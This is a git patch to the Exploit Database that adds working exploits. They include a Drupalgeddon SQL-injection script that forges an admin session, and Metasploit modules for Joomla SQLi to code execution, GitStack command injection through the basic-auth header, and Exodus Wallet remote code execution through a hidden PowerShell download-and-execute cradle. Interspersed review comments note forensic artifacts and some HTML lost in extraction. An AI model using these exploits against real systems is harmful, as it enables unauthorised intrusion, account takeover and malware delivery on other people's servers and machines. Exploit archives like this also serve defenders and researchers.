From 4a4b338844538cb62fb5758c628d49bbdcdbe1a5 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 30 Mar 2018 05:01:51 +0000
Subject: [PATCH] DB: 2018-03-30

8 changes to exploits/shellcodes
GitStack - Unsanitized Argument Remote Code Execution (Metasploit)
Exodus Wallet (ElectronJS Framework) - Remote Code Execution (Metasploit)
Drupal 7.0 < 7.31 - SQL Injection (1)
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1)
Drupal 7.0 < 7.31 - SQL Injection (2)
Drupal 7.32 - SQL Injection (PHP)
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2)
Drupal < 7.32 - Unauthenticated SQL Injection
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution)
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session)
Joomla Component Fields - SQLi Remote Code Execution (Metasploit)
---
 exploits/php/webapps/34984.py | 6 +-
 exploits/php/webapps/{34992.txt => 34992.py} | 0
 exploits/php/webapps/44355.php | 71 +++++
 exploits/php/webapps/44358.rb | 269 +++++++++++++++++
 exploits/windows/remote/44356.rb | 301 +++++++++++++++++++
 exploits/windows/remote/44357.rb | 104 +++++++
 files_exploits.csv | 12 +-
 7 files changed, 757 insertions(+), 6 deletions(-)
 rename exploits/php/webapps/{34992.txt => 34992.py} (100%)
 mode change 100644 => 100755
 create mode 100644 exploits/php/webapps/44355.php
 create mode 100755 exploits/php/webapps/44358.rb
 create mode 100755 exploits/windows/remote/44356.rb
 create mode 100755 exploits/windows/remote/44357.rb
diff --git a/exploits/php/webapps/34984.py b/exploits/php/webapps/34984.py
index 93608cc3d..df8b7b045 100755
--- a/exploits/php/webapps/34984.py
+++ b/exploits/php/webapps/34984.py
@@ -1,5 +1,7 @@
-#Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
-#Creditz to https://www.reddit.com/user/fyukyuk
+# Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
+# Creditz to https://www.reddit.com/user/fyukyuk
+# EDB Note ~ Updated version: https://github.com/kenorb/drupageddon/blob/master/drupal_7.x_sql_injection_sa-core-2014-005.py
+
 import urllib2,sys
 from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
 host = sys.argv[1]
diff --git a/exploits/php/webapps/34992.txt b/exploits/php/webapps/34992.py
old mode 100644
new mode 100755
similarity index 100%
rename from exploits/php/webapps/34992.txt
rename to exploits/php/webapps/34992.py
diff --git a/exploits/php/webapps/44355.php b/exploits/php/webapps/44355.php
new file mode 100644
index 000000000..e7765d7f3
--- /dev/null
+++ b/exploits/php/webapps/44355.php
@@ -0,0 +1,71 @@ + +//· + +include 'common.inc'; +include 'password.inc'; + +// set values +$user_name = 'admin'; + +$url = isset($argv[1])?$argv[1]:''; +$user_id = isset($argv[2])?intval($argv[2]):1; + +if ($url == '-h') { + echo "usage:\n"; + echo $argv[0].' $url [$user_id]'."\n"; + die(); +} + +if (empty($url) || strpos($url,'https') === False) { + echo "please state the cookie url. It works only with https urls.\n"; + die(); +} + +if (strpos($url, 'www.') === 0) { + $url = substr($url, 4); +} + +$url = rtrim($url,'/'); + +list( , $session_name) = explode('://', $url, 2); + +// use insecure cookie with sql inj. +$cookieName = 'SESS' . substr(hash('sha256', $session_name), 0, 32); +$password = user_hash_password('test'); + +$session_id = drupal_random_key(); +$sec_ssid = drupal_random_key(); + +$inject = "UNION SELECT $user_id,'$user_name','$password','','','',null,0,0,0,1,null,'',0,'',null,$user_id,'$session_id','','127.0.0.1',0,0,null -- "; + +$cookie = $cookieName.'[test+'.urlencode($inject).']='.$session_id.'; '.$cookieName.'[test]='.$session_id.'; S'.$cookieName.'='.$sec_ssid; + +// send the request to the server +$ch = curl_init($url); + +curl_setopt($ch,CURLOPT_HEADER,True); +curl_setopt($ch,CURLOPT_RETURNTRANSFER,True); +curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,False); +curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:34.0) Gecko/20100101 Firefox/34.0'); + +curl_setopt($ch,CURLOPT_HTTPHEADER,array( + 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Accept-Language: en-US,en;q=0.5' +)); + +curl_setopt($ch,CURLOPT_COOKIE,$cookie); + +$output = curl_exec($ch); + +curl_close($ch); + +echo "Session with this ID created:\n"; +echo "S".$cookieName.": ".$sec_ssid; \ No newline at end of file diff --git a/exploits/php/webapps/44358.rb b/exploits/php/webapps/44358.rb new file mode 100755 index 000000000..5dbb4c647 --- /dev/null +++ b/exploits/php/webapps/44358.rb 
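Review bot: The guard `strpos($url,'https') === False` only tests that the substring `https` occurs somewhere in the argument, so the "works only with https urls" message overstates what is checked; a prefix test, `strpos($url, 'https://') !== 0`, is what the message describes, and the following `strpos($url, 'www.') === 0` strip can never fire on a URL that still carries its scheme, so the two checks are out of order relative to the `explode('://', ...)` that extracts the host. `CURLOPT_SSL_VERIFYPEER` is set to `False`, which means the script accepts any certificate from the endpoint it insists on reaching over HTTPS; that choice should be stated in the file. The file also has no header at all — a line such as `// Drupal 7.x 'Drupalgeddon' SQL injection, see SA-CORE-2014-005`, as the sibling 34984.py carries, would tell a reader which advisory it demonstrates, and the UNION-in-cookie pattern it sends is exactly what a web server or WAF log would show for this class of request.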
@@ -0,0 +1,269 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + include Msf::Exploit::Remote::HTTP::Joomla + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Joomla Component Fields SQLi Remote Code Execution', + 'Description' => %q{ + This module exploits a SQL injection vulnerability in the com_fields + component, which was introduced to the core of Joomla in version 3.7.0. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Mateus Lino', # Vulnerability discovery + 'luisco100 ' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2017-8917' ], # SQLi + [ 'EDB', '42033' ], + [ 'URL', 'https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html' ] + ], + 'Payload' => + { + 'DisableNops' => true, + # Arbitrary big number. The payload gets sent as POST data, so + # really it's unlimited + 'Space' => 262144, # 256k + }, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => + [ + [ 'Joomla 3.7.0', {} ] + ], + 'Privileged' => false, + 'DisclosureDate' => 'May 17 2017', + 'DefaultTarget' => 0)) + + end + + def check + # Request using a non-existing table + val = sqli(rand_text_alphanumeric(rand(10)+6), 'check') + + if val.nil? + return Exploit::CheckCode::Safe + else + return Exploit::CheckCode::Vulnerable + end + end + + + def sqli(tableprefix, option) + # SQLi will grab Super User or Administrator sessions with a valid username and userid (else they are not logged in). + # The extra search for userid!=0 is because of our SQL data that's inserted in the session cookie history. + # This way we make sure that's excluded and we only get real Administrator or Super User sessions. 
+ if option == 'check' + start = rand_text_alpha(5) + start_h = start.unpack('H*')[0] + fin = rand_text_alpha(5) + fin_h = fin.unpack('H*')[0] + + sql = "(UPDATEXML(2170,CONCAT(0x2e,0x#{start_h},(SELECT MID((IFNULL(CAST(TO_BASE64(table_name) AS CHAR),0x20)),1,22) FROM information_schema.tables order by update_time DESC LIMIT 1),0x#{fin_h}),4879))" + else + start = rand_text_alpha(3) + start_h = start.unpack('H*')[0] + fin = rand_text_alpha(3) + fin_h = fin.unpack('H*')[0] + + sql = "(UPDATEXML(2170,CONCAT(0x2e,0x#{start_h},(SELECT MID(session_id,1,42) FROM #{tableprefix}session where userid!=0 LIMIT 1),0x#{fin_h}),4879))" + end + + # Retrieve cookies + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'index.php'), + 'vars_get' => { + 'option' => 'com_fields', + 'view' => 'fields', + 'layout'=> 'modal', + 'list[fullordering]' => sql + } + }) + + if res && res.code == 500 && res.body =~ /#{start}(.*)#{fin}/ + return $1 + end + return nil + end + + + def exploit + # Request using a non-existing table first, to retrieve the table prefix + val = sqli(rand_text_alphanumeric(rand(10)+6), 'check') + if val.nil? + fail_with(Failure::Unknown, "#{peer} - Error retrieving table prefix") + else + table_prefix = Base64.decode64(val) + table_prefix.sub! '_session', '' + print_status("#{peer} - Retrieved table prefix [ #{table_prefix} ]") + end + + # Retrieve the admin session using our retrieved table prefix + val = sqli("#{table_prefix}_", 'exploit') + if val.nil? 
+ fail_with(Failure::Unknown, "#{peer}: No logged-in Administrator or Super User user found!") + else + auth_cookie_part = val + print_status("#{peer} - Retrieved cookie [ #{auth_cookie_part} ]") + end + + # Retrieve cookies + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'administrator', 'index.php') + }) + + if res && res.code == 200 && res.get_cookies =~ /^([a-z0-9]+)=[a-z0-9]+;/ + cookie_begin = $1 + print_status("#{peer} - Retrieved unauthenticated cookie [ #{cookie_begin} ]") + else + fail_with(Failure::Unknown, "#{peer} - Error retrieving unauthenticated cookie") + end + + # Modify cookie to authenticated admin + auth_cookie = cookie_begin + auth_cookie << '=' + auth_cookie << auth_cookie_part + auth_cookie << ';' + + # Authenticated session + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'administrator', 'index.php'), + 'cookie' => auth_cookie + }) + + if res && res.code == 200 && res.body =~ /Control Panel -(.*?)- Administration/ + print_good("#{peer} - Successfully authenticated") + else + fail_with(Failure::Unknown, "#{peer} - Session failure") + end + + # Retrieve template view + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'administrator', 'index.php'), + 'cookie' => auth_cookie, + 'vars_get' => { + 'option' => 'com_templates', + 'view' => 'templates' + } + }) + + # We try to retrieve and store the first template found + if res && res.code == 200 && res.body =~ /\/administrator\/index.php\?option=com_templates&view=template&id=([0-9]+)&file=([a-zA-Z0-9=]+)/ + template_id = $1 + file_id = $2 + + form = res.body.split(/
]+) method="post" name="adminForm" id="adminForm"\>(.*)<\/form>/mi) + input_hidden = form[2].split(/]+)\/>/mi) + input_id = input_hidden[7].split("\"") + input_id = input_id[1] + + else + fail_with(Failure::Unknown, "Unable to retrieve template") + end + + + + filename = rand_text_alphanumeric(rand(10)+6) + # Create file + print_status("#{peer} - Creating file [ #(unknown).php ]") + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'administrator', 'index.php'), + 'cookie' => auth_cookie, + 'vars_get' => { + 'option' => 'com_templates', + 'task' => 'template.createFile', + 'id' => template_id, + 'file' => file_id, + }, + 'vars_post' => { + 'type' => 'php', + 'address' => '', + input_id => '1', + 'name' => filename + } + }) + + # Grab token + if res && res.code == 303 && res.headers['Location'] + location = res.headers['Location'] + print_status("#{peer} - Following redirect to [ #{location} ]") + res = send_request_cgi( + 'uri' => location, + 'method' => 'GET', + 'cookie' => auth_cookie + ) + + # Retrieving template token + if res && res.code == 200 && res.body =~ /&([a-z0-9]+)=1\">/ + token = $1 + print_status("#{peer} - Token [ #{token} ] retrieved") + else + fail_with(Failure::Unknown, "#{peer} - Retrieving token failed") + end + + if res && res.code == 200 && res.body =~ /(\/templates\/.*\/)template_preview.png/ + template_path = $1 + print_status("#{peer} - Template path [ #{template_path} ] retrieved") + else + fail_with(Failure::Unknown, "#{peer} - Unable to retrieve template path") + end + + else + fail_with(Failure::Unknown, "#{peer} - Creating file failed") + end + + filename_base64 = Rex::Text.encode_base64("/#(unknown).php") + + # Inject payload data into file + print_status("#{peer} - Insert payload into file [ #(unknown).php ]") + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, "administrator", "index.php"), + 'cookie' => auth_cookie, + 'vars_get' => { + 'option' => 
'com_templates', + 'view' => 'template', + 'id' => template_id, + 'file' => filename_base64, + }, + 'vars_post' => { + 'jform[source]' => payload.encoded, + 'task' => 'template.apply', + token => '1', + 'jform[extension_id]' => template_id, + 'jform[filename]' => "/#(unknown).php" + } + }) + + if res && res.code == 303 && res.headers['Location'] =~ /\/administrator\/index.php\?option=com_templates&view=template&id=#{template_id}&file=/ + print_status("#{peer} - Payload data inserted into [ #(unknown).php ]") + else + fail_with(Failure::Unknown, "#{peer} - Could not insert payload into file [ #(unknown).php ]") + end + + # Request payload + register_files_for_cleanup("#(unknown).php") + print_status("#{peer} - Executing payload") + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, template_path, "#(unknown).php"), + 'cookie' => auth_cookie + }) + end +end \ No newline at end of file diff --git a/exploits/windows/remote/44356.rb b/exploits/windows/remote/44356.rb new file mode 100755 index 000000000..db623df84 --- /dev/null +++ b/exploits/windows/remote/44356.rb 
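Review bot: `check` is not a passive probe here — it calls `sqli(..., 'check')`, which fires the UPDATEXML error-based injection and depends on a 500 response (`res.code == 500`), so the target's web and database error logs record the attempt even when only `check` is run; a comment above the method, `# Not passive: triggers the error-based injection and a 500 on the target`, would make that explicit. The Description should also say that `exploit` reuses an existing Administrator or Super User session rather than creating one, which is what the `fail_with(... "No logged-in Administrator or Super User user found!")` branch implies. Anyone triaging a host should know the artifacts this path leaves: a random-named `.php` file created through `com_templates` that is only registered for cleanup after the payload is written, and the injected `list[fullordering]` parameter in access logs. The `form = res.body.split(/ ... /mi)` regex lines near the template parsing appear truncated by extraction in this view (the tag patterns are missing), so that part of the hunk could not be reviewed.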
@@ -0,0 +1,301 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Powershell + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'GitStack Unsanitized Argument RCE', + 'Description' => %q{ + This module exploits a remote code execution vulnerability that + exists in GitStack through v2.3.10, caused by an unsanitized argument + being passed to an exec function call. This module has been tested + on GitStack v2.3.10. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Kacper Szurek', # Vulnerability discovery and PoC + 'Jacob Robles' # Metasploit module + ], + 'References' => + [ + ['CVE', '2018-5955'], + ['EDB', '43777'], + ['EDB', '44044'], + ['URL', 'https://security.szurek.pl/gitstack-2310-unauthenticated-rce.html'] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread' + }, + 'Platform' => 'win', + 'Targets' => [['Automatic', {}]], + 'Privileged' => true, + 'DisclosureDate' => 'Jan 15 2018', + 'DefaultTarget' => 0)) + end + + def check_web + begin + res = send_request_cgi({ + 'uri' => '/rest/settings/general/webinterface/', + 'method' => 'GET' + }) + rescue Rex::ConnectionError, Errno::ECONNRESET => e + print_error("Failed: #{e.class} - #{e.message}") + end + + if res && res.code == 200 + if res.body =~ /true/ + vprint_good('Web interface is enabled') + return true + else + vprint_error('Web interface is disabled') + return false + end + else + print_error('Unable to determine status of web interface') + return nil + end + end + + def check_repos + begin + res = send_request_cgi({ + 'uri' => '/rest/repository/', + 'method' => 'GET', + }) + rescue Rex::ConnectionError, Errno::ECONNRESET => e + print_error("Failed: #{e.class} - #{e.message}") + end + if res && res.code == 200 + begin + mylist = res.get_json_document 
+ rescue JSON::ParserError => e + print_error("Failed: #{e.class} - #{e.message}") + return nil + end + + if mylist.length == 0 + vprint_error('No repositories found') + return false + else + vprint_good('Repositories found') + return mylist + end + else + print_error('Unable to determine available repositories') + return nil + end + end + + def update_web(web) + data = {'enabled' => web} + begin + res = send_request_cgi({ + 'uri' => '/rest/settings/general/webinterface/', + 'method' => 'PUT', + 'data' => data.to_json + }) + rescue Rex::ConnectionError, Errno::ECONNRESET => e + print_error("Failed: #{e.class} - #{e.message}") + end + if res && res.code == 200 + vprint_good("#{res.body}") + end + end + + def create_repo + repo = Rex::Text.rand_text_alpha(5) + c_token = Rex::Text.rand_text_alpha(5) + begin + res = send_request_cgi({ + 'uri' => '/rest/repository/', + 'method' => 'POST', + 'cookie' => "csrftoken=#{c_token}", + 'vars_post' => { + 'name' => repo, + 'csrfmiddlewaretoken' => c_token + } + }) + rescue Rex::ConnectionError, Errno::ECONNRESET => e + print_error("Failed: #{e.class} - #{e.message}") + end + if res && res.code == 200 + vprint_good("#{res.body}") + return repo + else + print_status('Unable to create repository') + return nil + end + end + + def delete_repo(repo) + begin + res = send_request_cgi({ + 'uri' => "/rest/repository/#{repo}/", + 'method' => 'DELETE' + }) + rescue Rex::ConnectionError, Errno::ECONNRESET => e + print_error("Failed: #{e.class} - #{e.message}") + end + + if res && res.code == 200 + vprint_good("#{res.body}") + else + print_status('Failed to delete repository') + end + end + + def create_user + user = Rex::Text.rand_text_alpha(5) + pass = user + begin + res = send_request_cgi({ + 'uri' => '/rest/user/', + 'method' => 'POST', + 'vars_post' => { + 'username' => user, + 'password' => pass + } + }) + rescue Rex::ConnectionError, Errno::ECONNRESET => e + print_error("Failed: #{e.class} - #{e.message}") + end + if res && res.code 
== 200 + vprint_good("Created user: #{user}") + return user + else + print_error("Failed to create user") + return nil + end + end + + def delete_user(user) + begin + res = send_request_cgi({ + 'uri' => "/rest/user/#{user}/", + 'method' => 'DELETE' + }) + rescue Rex::ConnectionError, Errno::ECONNRESET => e + print_error("Failed: #{e.class} - #{e.message}") + end + if res && res.code == 200 + vprint_good("#{res.body}") + else + print_status('Delete user unsuccessful') + end + end + + def mod_user(repo, user, method) + begin + res = send_request_cgi({ + 'uri' => "/rest/repository/#{repo}/user/#{user}/", + 'method' => method + }) + rescue Rex::ConnectionError, Errno::ECONNRESET => e + print_error("Failed: #{e.class} - #{e.message}") + end + if res && res.code == 200 + vprint_good("#{res.body}") + else + print_status('Unable to add/remove user from repo') + end + end + + def repo_users(repo) + begin + res = send_request_cgi({ + 'uri' => "/rest/repository/#{repo}/user/", + 'method' => 'GET' + }) + rescue Rex::ConnectionError, Errno::ECONNRESET => e + print_error("Failed: #{e.class} - #{e.message}") + end + if res && res.code == 200 + begin + users = res.get_json_document + users -= ['everyone'] + rescue JSON::ParserError => e + print_error("Failed: #{e.class} - #{e.message}") + users = nil + end + else + return nil + end + return users + end + + def run_exploit(repo, user, cmd) + begin + res = send_request_cgi({ + 'uri' => '/web/index.php', + 'method' => 'GET', + 'authorization' => basic_auth(user, "#{Rex::Text.rand_text_alpha(1)} && cmd /c #{cmd}"), + 'vars_get' => { + 'p' => "#{repo}.git", + 'a' => 'summary' + } + }) + rescue Rex::ConnectionError, Errno::ECONNRESET => e + print_error("Failed: #{e.class} - #{e.message}") + end + end + + def exploit + command = cmd_psh_payload( + payload.encoded, + payload_instance.arch.first, + { :remove_comspec => true, :encode_final_payload => true } + ) + fail_with(Failure::PayloadFailed, "Payload exceeds space left in exec call") 
if command.length > 6110 + + web = check_web + repos = check_repos + + if web.nil? || repos.nil? + return + end + + unless web + update_web(!web) + # Wait for interface + sleep 8 + end + + if repos + pwn_repo = repos[0]['name'] + else + pwn_repo = create_repo + end + + r_users = repo_users(pwn_repo) + if r_users.present? + pwn_user = r_users[0] + run_exploit(pwn_repo, pwn_user, command) + else + pwn_user = create_user + if pwn_user + mod_user(pwn_repo, pwn_user, 'POST') + run_exploit(pwn_repo, pwn_user, command) + mod_user(pwn_repo, pwn_user, 'DELETE') + delete_user(pwn_user) + end + end + + unless web + update_web(web) + end + + unless repos + delete_repo(pwn_repo) + end + end +end \ No newline at end of file diff --git a/exploits/windows/remote/44357.rb b/exploits/windows/remote/44357.rb new file mode 100755 index 000000000..ccc983091 --- /dev/null +++ b/exploits/windows/remote/44357.rb 
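Review bot: The module changes target state — `update_web(!web)` enables the web interface, and `create_repo` and `create_user` add a repository and an account with five-letter random names — but the 'Description' says nothing about it; a sentence such as `Enables the web interface and creates a temporary repository and user when none exist; these are removed afterwards on success.` belongs there. Cleanup is only reached on the happy path: `create_repo` can return nil and `exploit` still continues into `repo_users(nil)` and later `delete_repo(nil)`, and `run_exploit` never reports its result, so an aborted run leaves the user, the repository and the enabled web interface behind — for incident triage on a GitStack host those are the artifacts to look for, together with the `Authorization` header carrying `&& cmd /c` in the `/web/index.php` request. The fixed `sleep 8` after enabling the interface should say what it waits for (presumably the interface coming back up — confirm), e.g. `# wait for the web interface to restart`.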
@@ -0,0 +1,104 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/exploit/powershell' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ManualRanking + + include Msf::Exploit::EXE + include Msf::Exploit::Powershell + include Msf::Exploit::Remote::HttpServer::HTML + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Exodus Wallet (ElectronJS Framework) remote Code Execution', + 'Description' => %q( + This module exploits a Remote Code Execution vulnerability in Exodus Wallet, + a vulnerability in the ElectronJS Framework protocol handler can be used to + get arbitrary command execution if the user clicks on a specially crafted URL. + ), + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Wflki', # Original exploit author + 'Daniel Teixeira' # MSF module author + ], + 'DefaultOptions' => + { + 'SRVPORT' => '80', + 'URIPATH' => '/', + }, + 'References' => + [ + [ 'EDB', '43899' ], + [ 'BID', '102796' ], + [ 'CVE', '2018-1000006' ], + ], + 'Platform' => 'win', + 'Targets' => + [ + ['PSH (Binary)', { + 'Platform' => 'win', + 'Arch' => [ARCH_X86, ARCH_X64] + }] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jan 25 2018' + )) + + register_advanced_options( + [ + OptBool.new('PSH-Proxy', [ true, 'PSH - Use the system proxy', true ]), + ], self.class + ) + end + + def gen_psh(url) + ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl + + download_string = datastore['PSH-Proxy'] ? 
(Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url)) + + download_and_run = "#{ignore_cert}#{download_string}" + + return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run) + end + + def serve_payload(cli) + data = cmd_psh_payload(payload.encoded, + payload_instance.arch.first, + remove_comspec: true, + exec_in_place: true + ) + + print_status("Delivering Payload") + send_response_html(cli, data, 'Content-Type' => 'application/octet-stream') + end + + def serve_page(cli) + psh = gen_psh("#{get_uri}payload") + psh_escaped = psh.gsub("\\","\\\\\\\\").gsub("'","\\\\'") + val = rand_text_alpha(5) + + html = %Q| + + + +| + send_response_html(cli, html) + end + + def on_request_uri(cli, request) + case request.uri + when /payload$/ + serve_payload(cli) + else + serve_page(cli) + end + end + +end \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 0eb52275f..726d5660e 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
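Review bot: The 'Name' string `Exodus Wallet (ElectronJS Framework) remote Code Execution` does not match the capitalisation of the `files_exploits.csv` entry added in this same commit (`Remote Code Execution`); make them agree. The HTML body in `serve_page` arrives here as an empty `%Q| |` literal, so the page markup was dropped by extraction and the use of `psh_escaped` and `val` cannot be reviewed from this hunk. What is visible is the delivery contract of `gen_psh`: a `download_and_exec_string` command line, run `noprofile` with `windowstyle: 'hidden'`, with `ignore_cert` prepended only when `ssl` is set — that deserves a one-line comment on the method, e.g. `# Builds the hidden, no-profile powershell.exe command line that fetches and runs the payload from url`. The explicit `require 'msf/core/exploit/powershell'` appears redundant with `include Msf::Exploit::Powershell`; the other module in this commit that includes the same mixin (44356.rb) does without it.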
@@ -16361,6 +16361,8 @@ id,file,description,date,author,type,platform,port
 44294,exploits/windows/remote/44294.html,"Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Execution",2018-03-16,Rh0,remote,windows,
 44345,exploits/windows/remote/44345.txt,"Acrolinx Server < 5.2.5 - Directory Traversal",2018-03-26,"Berk Dusunur",remote,windows,
 44349,exploits/linux/remote/44349.md,"TestLink Open Source Test Management < 1.9.16 - Remote Code Execution (PoC)",2018-03-27,"Manish Tanwar",remote,linux,
+44356,exploits/windows/remote/44356.rb,"GitStack - Unsanitized Argument Remote Code Execution (Metasploit)",2018-03-29,Metasploit,remote,windows,
+44357,exploits/windows/remote/44357.rb,"Exodus Wallet (ElectronJS Framework) - Remote Code Execution (Metasploit)",2018-03-29,Metasploit,remote,windows,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -34400,13 +34402,13 @@ id,file,description,date,author,type,platform,port
 34974,exploits/php/webapps/34974.txt,"WordPress Plugin WP Survey And Quiz Tool 1.2.1 - Cross-Site Scripting",2010-11-08,"John Leitch",webapps,php,
 34994,exploits/cgi/webapps/34994.txt,"OpenWrt 10.03 - Multiple Cross-Site Scripting Vulnerabilities",2010-11-13,"dave b",webapps,cgi,
 34995,exploits/php/webapps/34995.txt,"Simea CMS - 'index.php' SQL Injection",2010-11-16,Cru3l.b0y,webapps,php,
-34984,exploits/php/webapps/34984.py,"Drupal 7.0 < 7.31 - SQL Injection (1)",2014-10-16,fyukyuk,webapps,php,
+34984,exploits/php/webapps/34984.py,"Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1)",2014-10-16,stopstene,webapps,php,
 34988,exploits/php/webapps/34988.txt,"PHPShop 2.1 EE - 'name_new' Cross-Site Scripting",2010-11-10,MustLive,webapps,php,
 34989,exploits/php/webapps/34989.txt,"WeBid 0.85P1 - Multiple Input Validation Vulnerabilities",2010-11-10,"John Leitch",webapps,php,
 34990,exploits/php/webapps/34990.txt,"Ricoh Web Image Monitor 2.03 - Cross-Site Scripting",2010-11-09,thelightcosine,webapps,php,
 34996,exploits/php/webapps/34996.txt,"Raised Eyebrow CMS - 'venue.php' SQL Injection",2010-11-16,Cru3l.b0y,webapps,php,
-34992,exploits/php/webapps/34992.txt,"Drupal 7.0 < 7.31 - SQL Injection (2)",2014-10-17,"Claudio Viviani",webapps,php,
-34993,exploits/php/webapps/34993.php,"Drupal 7.32 - SQL Injection (PHP)",2014-10-17,"Dustin Dörr",webapps,php,
+34992,exploits/php/webapps/34992.py,"Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)",2014-10-17,"Claudio Viviani",webapps,php,
+34993,exploits/php/webapps/34993.php,"Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2)",2014-10-17,"Dustin Dörr",webapps,php,
 35004,exploits/php/webapps/35004.txt,"CompactCMS 1.4.1 - Multiple Cross-Site Scripting Vulnerabilities (1)",2010-11-18,"High-Tech Bridge SA",webapps,php,
 35008,exploits/cgi/webapps/35008.txt,"Hot Links SQL 3.2 - 'report.cgi' SQL Injection",2010-11-22,"Aliaksandr Hartsuyeu",webapps,cgi,
 35012,exploits/multiple/webapps/35012.txt,"ZYXEL P-660R-T1 V2 - 'HomeCurrent_Date' Cross-Site Scripting",2010-11-23,"Usman Saeed",webapps,multiple,
@@ -34505,7 +34507,7 @@ id,file,description,date,author,type,platform,port
 35145,exploits/php/webapps/35145.txt,"Pligg CMS 1.1.3 - 'range' SQL Injection",2010-12-27,Dr.NeT,webapps,php,
 35146,exploits/php/webapps/35146.txt,"PHP < 5.6.2 - 'Shellshock' 'disable_functions()' Bypass Command Injection",2014-11-03,"Ryan King (Starfall)",webapps,php,
 35149,exploits/php/webapps/35149.txt,"LiveZilla 3.2.0.2 - 'Track' Module 'server.php' Cross-Site Scripting",2010-12-27,"Ulisses Castro",webapps,php,
-35150,exploits/php/webapps/35150.php,"Drupal < 7.32 - Unauthenticated SQL Injection",2014-11-03,"Stefan Horst",webapps,php,443
+35150,exploits/php/webapps/35150.php,"Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution)",2014-11-03,"Stefan Horst",webapps,php,443
 35155,exploits/php/webapps/35155.txt,"CruxCMS 3.0 - Multiple Input Validation Vulnerabilities",2010-12-26,ToXiC,webapps,php,
 35156,exploits/php/webapps/35156.txt,"Coppermine Photo Gallery 1.5.10 - 'help.php' Cross-Site Scripting",2010-12-28,waraxe,webapps,php,
 35157,exploits/php/webapps/35157.html,"Coppermine Photo Gallery 1.5.10 - 'searchnew.php' Cross-Site Scripting",2010-12-28,waraxe,webapps,php,
@@ -39055,3 +39057,5 @@ id,file,description,date,author,type,platform,port
 44352,exploits/windows/webapps/44352.txt,"Microsoft Windows Remote Assistance - XML External Entity Injection",2018-03-28,"Nabeel Ahmed",webapps,windows,
 44353,exploits/hardware/webapps/44353.sh,"Tenda N11 Wireless Router 5.07.43_en_NEX01 - Remote DNS Change",2018-03-28,"Todor Donev",webapps,hardware,
 44354,exploits/php/webapps/44354.txt,"Open-AuditIT Professional 2.1 - Cross-Site Scripting",2018-03-28,"Nilesh Sapariya",webapps,php,
+44355,exploits/php/webapps/44355.php,"Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session)",2014-11-03,"Stefan Horst",webapps,php,443
+44358,exploits/php/webapps/44358.rb,"Joomla Component Fields - SQLi Remote Code Execution (Metasploit)",2018-03-29,Metasploit,webapps,php,